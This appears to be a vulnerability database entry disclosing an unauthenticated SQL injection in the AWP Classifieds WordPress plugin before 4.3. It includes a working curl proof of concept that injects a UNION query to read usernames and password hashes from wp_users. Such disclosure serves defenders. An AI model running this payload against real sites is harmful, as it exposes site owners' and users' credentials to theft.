Lucene search

K
wpexploitCydaveWPEX-ID:546C47C2-5B4B-46DB-B754-C6B43AEF2660
HistoryOct 10, 2022 - 12:00 a.m.

AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi

2022-10-1000:00:00
cydave
67

0.002 Low

EPSS

Percentile

57.6%

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users and when a specific premium module is active, leading to a SQL injection

To read the user_login and user_pass columns from the wp_users table:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent_type=country&context=search&parent=Algeria&type=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-'

0.002 Low

EPSS

Percentile

57.6%

Related for WPEX-ID:546C47C2-5B4B-46DB-B754-C6B43AEF2660